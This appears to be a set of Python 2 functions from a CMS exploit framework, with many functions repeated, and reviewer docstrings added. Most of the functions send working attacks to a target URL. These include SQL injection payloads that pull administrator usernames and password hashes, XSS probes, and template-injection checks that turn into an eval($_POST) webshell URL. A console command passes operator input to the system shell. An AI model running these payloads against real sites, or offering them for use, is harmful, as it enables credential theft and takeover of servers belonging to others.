def exploit(URL, Thread):
    """Probe *URL* with a plain GET and report whether it answers HTTP 200.

    :param URL: address to request.
    :param Thread: not used by this function.
    :return: the string "200" on a 200 response; otherwise None (implicit).
    """
    logger.process("Request " + URL)
    # NOTE(review): no timeout is given, so an unresponsive host blocks this
    # call indefinitely (the other plugins on this page pass timeout=5).
    r = requests.get(URL)
    r.close()
    if r.status_code == 200:
        logger.success("200")
        return "200"
def get_hash(url):
    """Fetch the administrator's credential hash.

    :param url: site address (the POST endpoint).
    :return: dict with keys "username" and "md5".

    The POST body carries an error-based SQL injection payload in the
    ``gids`` parameters; the ``0x7e7e7e`` / ``0x7e`` hex constants in it
    become the ``~~~`` / ``~`` delimiters that the response is split on below.
    """
    logger.process("Getting manager's hash")
    r = requests.post(url, data={
        "gids[99]": "'",
        "gids[100][0]": ") and (select 1 from (select count(*"
                        "),concat((select (select (select con"
                        "cat(0x7e7e7e,username,0x7e,password,"
                        "0x7e7e7e) from cdb_members limit 0,1"
                        ") ) from `information_schema`.tables"
                        " limit 0,1),floor(rand(0)*2))x from "
                        "information_schema.tables group by x"
                        ")a)#"
    }, timeout=5)
    r.close()
    # Raises IndexError when the response does not contain the "~~~" marker
    # (no success check is done before parsing).
    result = r.text.split("~~~")[1].split("~")
    return {"username": result[0], "md5": result[1]}
def get_hash(url):
    """Fetch the administrator's credential hash.

    :param url: site address (the POST endpoint).
    :return: dict with keys "username" and "md5".

    The POST body carries an error-based SQL injection payload in the
    ``gids`` parameters; the ``0x7e7e7e`` / ``0x7e`` hex constants in it
    become the ``~~~`` / ``~`` delimiters that the response is split on below.
    """
    logger.process("Getting manager's hash")
    r = requests.post(
        url,
        data={
            "gids[99]": "'",
            "gids[100][0]": ") and (select 1 from (select count(*"
                            "),concat((select (select (select con"
                            "cat(0x7e7e7e,username,0x7e,password,"
                            "0x7e7e7e) from cdb_members limit 0,1"
                            ") ) from `information_schema`.tables"
                            " limit 0,1),floor(rand(0)*2))x from "
                            "information_schema.tables group by x"
                            ")a)#",
        },
        timeout=5,
    )
    r.close()
    # Raises IndexError when the response does not contain the "~~~" marker
    # (no success check is done before parsing).
    result = r.text.split("~~~")[1].split("~")
    return {"username": result[0], "md5": result[1]}
def exploit(URL, Thread):
    """Probe *URL* with a plain GET and report whether it answers HTTP 200.

    :param URL: address to request.
    :param Thread: not used by this function.
    :return: the string "200" on a 200 response; otherwise None (implicit).
    """
    logger.process("Request "+URL)
    # NOTE(review): no timeout is given, so an unresponsive host blocks this
    # call indefinitely (the other plugins on this page pass timeout=5).
    r = requests.get(URL)
    r.close()
    if r.status_code == 200:
        logger.success("200")
        return "200"
def do_rebuild_db(self, line):
    """Clear the current database and rebuild it.

    :param line: console argument string; not used by this command.
    :return: None
    """
    for step in ("Clear current database", "Rebuild database"):
        logger.process(step)
    self.db_rebuild()
    logger.success("OK")
def exploit(URL):
    """Run ``verify`` against *URL* and report the credentials it returns.

    :param URL: site address handed to ``verify``.
    :return: "URL: username|hash" on success; None when ``verify`` fails or
        raises (the bare ``except`` below swallows every exception,
        including KeyboardInterrupt, and returns None silently).
    """
    logger.process("Requesting target site")
    try:
        # assumes verify() returns an indexable pair (username, hash) — confirm
        result=verify(URL)
        logger.success("Username: %s" % result[0])
        logger.success("password: %s" % result[1])
        return "%s: %s|%s" % (URL, result[0], result[1])
    except:
        # NOTE(review): bare except — network errors, bad responses and
        # programming errors are all indistinguishable from "not vulnerable".
        pass
def do_shell(self, arg):
    """Run an operating-system command from the interactive console.

    :param arg: the command line typed by the operator; it is handed to the
        system shell verbatim (``shell=True``), so shell metacharacters are
        interpreted by design.
    :return: None; the command's stdout is printed. stderr is not captured.
    """
    logger.process("exec: %s" % arg)
    sub_cmd = subprocess.Popen(arg, shell=True, stdout=subprocess.PIPE)
    # Python 2 print statements: blank line, then stdout without a trailing newline.
    print
    print sub_cmd.communicate()[0],
def exploit(URL):
    """Check whether the site serves a known build of ``flvplayer.swf``.

    :param URL: site base address.
    :return: the probed URL when the served file's MD5 matches the
        hard-coded digest; otherwise None (implicit). A missing, patched or
        otherwise different file does not match.
    """
    url = URL + "/static/image/common/flvplayer.swf?file=1.flv&" \
                "linkfromdisplay=true&link=javascript:alert(1);"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    # Fingerprint by content hash, not by status code or body text.
    if hashlib.md5(r.content).hexdigest() == "7d675405ff7c94fa899784b7ccae68d3":
        logger.success("Exploitable!")
        logger.success(url)
        return url
def exploit(URL):
    """Send the ``/plus/search.php`` injection request and report credentials.

    :param URL: site base address.
    :return: "URL: username|hash" on success; None otherwise.
    """
    url=URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\\'`+]=a"
    logger.process("Requesting target site")
    # NOTE(review): verify()'s return value is discarded; the request below
    # is sent regardless of what verify() found.
    verify(URL)
    try:
        # assumes get_hash() returns an indexable pair (username, hash) — confirm
        result=get_hash(url)
        logger.success("Username: %s" % result[0])
        logger.success("password: %s" % result[1])
        return "%s: %s|%s" % (URL, result[0], result[1])
    except:
        # NOTE(review): bare except — every failure mode is reported as
        # "nothing found" and the function returns None.
        pass
def exploit(URL):
    """Check whether the site serves a known build of KindEditor's ``swfupload.swf``.

    :param URL: site base address.
    :return: the probed URL when the served file's MD5 matches the
        hard-coded digest; otherwise None (implicit).
    """
    url = URL + "/plugins/kindeditor/plugins/multiimage/images/swfupload.swf" \
                "?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!ale" \
                "rt%281%29;//"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    # Fingerprint by content hash; the query string does not affect the match.
    if hashlib.md5(r.content).hexdigest() == "3a1c6cc728dddc258091a601f28a9c12":
        logger.success("Exploitable!")
        logger.success(url)
        return url
def exploit(URL):
    """Test whether the ``name`` path segment is evaluated as a template expression.

    :param URL: site base address.
    :return: a URL with the expression rewritten when the response carries
        the ``phpinfo()`` page title; otherwise None (implicit).
    """
    url = URL + "/index.php/Index/index/name/${@phpinfo()}"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    # The title is only present if the server evaluated the expression.
    if "<title>phpinfo()</title>" in r.text:
        logger.success("Exploitable!")
        logger.success("Phpinfo: %s" % url)
        url = url.replace("@phpinfo()", "@print(eval($_POST[chu]))")
        logger.success("Webshell: %s" % url)
        return url
def exploit(URL):
    """Check whether the site serves a known build of KindEditor's ``swfupload.swf``.

    :param URL: site base address.
    :return: the probed URL when the served file's MD5 matches the
        hard-coded digest; otherwise None (implicit).
    """
    url = URL + "/plugins/kindeditor/plugins/multiimage/images/swfupload.swf" \
                "?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!ale" \
                "rt%281%29;//"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    # Fingerprint by content hash; the query string does not affect the match.
    if hashlib.md5(
            r.content).hexdigest() == "3a1c6cc728dddc258091a601f28a9c12":
        logger.success("Exploitable!")
        logger.success(url)
        return url
def exploit(URL):
    """Test whether hex-escaped markup in the ``s`` query parameter is reflected decoded.

    :param URL: site base address.
    :return: the probed URL when the decoded script tag appears in the
        response body; otherwise None (implicit).
    """
    # Raw string literals: the backslash sequences are sent verbatim, not
    # decoded by Python; the server is what decodes them (if vulnerable).
    url = URL + r"/?s=\\x3c\\x2f\\x74\\x69\\x74\\x6c\\x65\\x3e\\x3c\\x73" \
                r"\\x63\\x72\\x69\\x70\\x74\\x3e\\x61\\x6c\\x65\\x72\\x74" \
                r"\\x28\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e\\x64" \
                r"\\x6f\\x6d\\x61\\x69\\x6e\\x29\\x3c\\x2f\\x73\\x63\\x72" \
                r"\\x69\\x70\\x74\\x3e"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    if "</title><script>alert(document.domain)</script>" in r.text:
        logger.success("Exploitable!")
        logger.success(url)
        return url
def exploit(URL, Cookie):
    """Send the ``m=topic`` union-select request and report the first user row.

    :param URL: site base address.
    :param Cookie: cookies forwarded with the request (an authenticated session, presumably — confirm).
    :return: "URL: username|hash" when the marker is found; otherwise None (implicit).
    """
    logger.process("Requesting " + URL)
    # 0x68616e64736f6d65636875 is the hex of "handsomechu"; 0x7e7e7e is "~~~".
    # Both are the delimiters parsed out of the response below.
    url = URL + "/?m=topic&a=topic&keyword=a%27%20and%201=2%20union%20select" \
                "%201,2,3,concat(0x68616e64736f6d65636875,user_name,0x7e7e7e," \
                "password,0x68616e64736f6d65636875),5%20from%20et_users%23"
    r = requests.get(url=url, cookies=Cookie, timeout=5)
    r.close()
    if "handsomechu" in r.text:
        logger.success("Exploitable!")
        handsomechu = r.text.split("handsomechu")[1].split("~~~")
        # ValueError unless the segment splits into exactly two parts.
        username, password = handsomechu
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % password)
        return "%s: %s|%s" % (URL, username, password)
def exploit(URL):
    """Send the ``home/search`` union-select request and report the first user row.

    :param URL: site base address.
    :return: "URL: username|hash" when the marker is found; otherwise None (implicit).
    """
    # 0x6368756973686572657e7e7e is the hex of "chuishere~~~"; 0x7e is "~".
    url = URL + "/index.php/home/search?q=1'union select 1,2,3,4,concat" \
                "(0x6368756973686572657e7e7e,username,0x7e,password,0x7" \
                "e7e7e),6,7,8,9,0,1,2,3,4,5,6,7 from stb_users limit 1-" \
                "- &sitesearch=http://127.0.0.1/startbbs/"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    if "chuishere" in r.text:
        logger.success("Exploitable!")
        # The presence check is on "chuishere" but parsing splits on "~~~";
        # ValueError unless the middle segment holds exactly one "~".
        username, md5 = r.text.split("~~~")[1].split("~")
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % md5)
        return "%s: %s|%s" % (URL, username, md5)
def exploit(URL, Cookie):
    """Send the ``m=message`` union-select request and report the second user row.

    :param URL: site base address.
    :param Cookie: cookies forwarded with the request (an authenticated session, presumably — confirm).
    :return: "URL: username|hash" when the marker is found; otherwise None (implicit).
    """
    logger.process("Requesting " + URL)
    # 0x68616e64736f6d65636875 is the hex of "handsomechu"; 0x7e7e7e is "~~~".
    # Both are the delimiters parsed out of the response below.
    url = URL + "/?m=message&a=show&uid=%27)%20union%20select%20concat(0x686" \
                "16e64736f6d65636875,user_name,0x7e7e7e,password,0x68616e647" \
                "36f6d65636875)%20from%20et_users%20limit%201,1%23"
    r = requests.get(url=url, cookies=Cookie, timeout=5)
    r.close()
    if "handsomechu" in r.text:
        logger.success("Exploitable!")
        handsomechu = r.text.split("handsomechu")[1].split("~~~")
        # ValueError unless the segment splits into exactly two parts.
        username, password = handsomechu
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % password)
        return "%s: %s|%s" % (URL, username, password)
def exploit(URL):
    """Test two search routes for template-expression evaluation of ``keyword``.

    :param URL: site base address.
    :return: a URL with the expression rewritten for the first route whose
        response carries the ``phpinfo()`` page title; None (implicit) when
        neither route matches.
    """
    urls = [
        URL + "/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D",
        URL + "/search.html?keyword=%24%7B%40phpinfo%28%29%7D",
    ]
    # zip(range(1, 3), ...) only numbers the log lines 1 and 2.
    for i, url in zip(range(1, 3), urls):
        logger.process("Testing URL %d..." % i)
        r = requests.get(url, timeout=5)
        r.close()
        if "<title>phpinfo()</title>" in r.text:
            logger.success("Exploitable!")
            logger.success("Phpinfo: %s" % url)
            url = url.replace("%24%7B%40phpinfo%28%29%7D", "%24%7B%40eval(%24_POST%5B'chu'%5D)%7D")
            logger.success("WebShell: %s" % url)
            return url
def exploit(URL):
    """Test two search routes for template-expression evaluation of ``keyword``.

    :param URL: site base address.
    :return: a URL with the expression rewritten for the first route whose
        response carries the ``phpinfo()`` page title; None (implicit) when
        neither route matches.
    """
    urls = [
        URL + "/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D",
        URL + "/search.html?keyword=%24%7B%40phpinfo%28%29%7D"
    ]
    # zip(range(1, 3), ...) only numbers the log lines 1 and 2.
    for i, url in zip(range(1, 3), urls):
        logger.process("Testing URL %d..." % i)
        r = requests.get(url, timeout=5)
        r.close()
        if "<title>phpinfo()</title>" in r.text:
            logger.success("Exploitable!")
            logger.success("Phpinfo: %s" % url)
            url = url.replace("%24%7B%40phpinfo%28%29%7D", "%24%7B%40eval(%24_POST%5B'chu'%5D)%7D")
            logger.success("WebShell: %s" % url)
            return url
def exploit(URL, Cookie):
    """Send the ``m=topic`` union-select request and report the first user row.

    :param URL: site base address.
    :param Cookie: cookies forwarded with the request (an authenticated session, presumably — confirm).
    :return: "URL: username|hash" when the marker is found; otherwise None (implicit).
    """
    logger.process("Requesting "+URL)
    # 0x68616e64736f6d65636875 is the hex of "handsomechu"; 0x7e7e7e is "~~~".
    # Both are the delimiters parsed out of the response below.
    url = URL + "/?m=topic&a=topic&keyword=a%27%20and%201=2%20union%20select" \
                "%201,2,3,concat(0x68616e64736f6d65636875,user_name,0x7e7e7e," \
                "password,0x68616e64736f6d65636875),5%20from%20et_users%23"
    r = requests.get(
        url=url,
        cookies=Cookie,
        timeout=5
    )
    r.close()
    if "handsomechu" in r.text:
        logger.success("Exploitable!")
        handsomechu = r.text.split("handsomechu")[1].split("~~~")
        # ValueError unless the segment splits into exactly two parts.
        username, password = handsomechu
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % password)
        return "%s: %s|%s" % (URL, username, password)
def exploit(URL, Cookie):
    """Send the ``m=message`` union-select request and report the second user row.

    :param URL: site base address.
    :param Cookie: cookies forwarded with the request (an authenticated session, presumably — confirm).
    :return: "URL: username|hash" when the marker is found; otherwise None (implicit).
    """
    logger.process("Requesting "+URL)
    # 0x68616e64736f6d65636875 is the hex of "handsomechu"; 0x7e7e7e is "~~~".
    # Both are the delimiters parsed out of the response below.
    url = URL + "/?m=message&a=show&uid=%27)%20union%20select%20concat(0x686" \
                "16e64736f6d65636875,user_name,0x7e7e7e,password,0x68616e647" \
                "36f6d65636875)%20from%20et_users%20limit%201,1%23"
    r = requests.get(
        url=url,
        cookies=Cookie,
        timeout=5
    )
    r.close()
    if "handsomechu" in r.text:
        logger.success("Exploitable!")
        handsomechu = r.text.split("handsomechu")[1].split("~~~")
        # ValueError unless the segment splits into exactly two parts.
        username, password = handsomechu
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % password)
        return "%s: %s|%s" % (URL, username, password)
def verify(url):
    """Check whether the ``gids`` POST parameters are injectable.

    :param url: site address (the POST endpoint).
    :return: True when the response contains "MySQL Query Error";
        otherwise None (implicit), not False.
    """
    logger.process("Requesting target site")
    # Detection relies on the application echoing the database error text.
    r = requests.post(url, data={
        "gids[99]": "'",
        "gids[100][0]": ") and (select 1 from (select count(*"
                        "),concat(version(),floor(rand(0)*2))"
                        "x from information_schema.tables gro"
                        "up by x)a)#"
    }, timeout=5)
    r.close()
    if "MySQL Query Error" in r.text:
        logger.success("Exploitable!")
        return True
def verify(url):
    """Check whether the ``gids`` POST parameters are injectable.

    :param url: site address (the POST endpoint).
    :return: True when the response contains "MySQL Query Error";
        otherwise None (implicit), not False.
    """
    logger.process("Requesting target site")
    # Detection relies on the application echoing the database error text.
    r = requests.post(
        url,
        data={
            "gids[99]": "'",
            "gids[100][0]": ") and (select 1 from (select count(*"
                            "),concat(version(),floor(rand(0)*2))"
                            "x from information_schema.tables gro"
                            "up by x)a)#",
        },
        timeout=5,
    )
    r.close()
    if "MySQL Query Error" in r.text:
        logger.success("Exploitable!")
        return True
def exec_plugins(self):
    """Load every plugin, then run them against all targets on a thread pool.

    Optionally runs CMS identification first (``self.what_web``). Results are
    reported through ``self.log_vulns()`` once the pool has drained.

    :return: None
    """
    logger.process("Loading Plugins")
    self.load_plugins()
    if self.what_web:
        logger.process("Loading multi_whatweb")
        self.identify_cms()
    for name in self.plugins:
        logger.process("Loading %s" % name)
        self.load_plugin(name)
    workers = threadpool.ThreadPool(self.thread_number)
    # One work item per target, each invoking exec_single_plugin.
    for work_item in threadpool.makeRequests(self.exec_single_plugin, self.targets):
        workers.putRequest(work_item)
    workers.wait()
    self.log_vulns()
def do_update(self, line):
    """Fetch the remote plugin list, download what is missing locally, rebuild the DB.

    :param line: console argument string; not used by this command.
    :return: None

    NOTE(review): nothing in this method shows the downloaded plugins being
    integrity-checked (signature or pinned hash) before they are loaded and
    executed by the framework — confirm in ``down_plugins``.
    """
    for banner in ("", "Attempting to update the CMS Exploit Framework", ""):
        logger.process(banner)
    logger.process("Downloading plugin list")
    remote = self.down_plugin_list()
    logger.process("Getting local plugin list")
    local = self.get_local_plugin_list()
    logger.process("Comparing and updating")
    added = self.down_plugins(remote, local)
    logger.success("New plugins: %s" % str(added))
    self.do_rebuild_db("")
def do_shell(self, arg):
    """Run an operating-system command from the interactive console.

    :param arg: the command line typed by the operator; it is handed to the
        system shell verbatim (``shell=True``), so shell metacharacters are
        interpreted by design.
    :return: None; the command's stdout is printed. stderr is not captured.
    """
    logger.process("exec: %s" % arg)
    sub_cmd = subprocess.Popen(arg, shell=True, stdout=subprocess.PIPE)
    # Python 2 print statements: a blank line, then the captured stdout.
    print
    print sub_cmd.communicate()[0]
def do_rebuild_db(self, line):
    """Clear and rebuild the database (progress messages are logged in Chinese).

    :param line: console argument string; not used by this command.
    :return: None
    """
    for message in ("清空数据库", "重建数据库"):
        logger.process(message)
    self.db_rebuild()
    logger.success("OK")
def do_init_db(self, line):
    """Initialise the database (progress message is logged in Chinese).

    :param line: console argument string; not used by this command.
    :return: None
    """
    init_message = "初始化数据库"
    logger.process(init_message)
    self.db_init()
    logger.success("OK")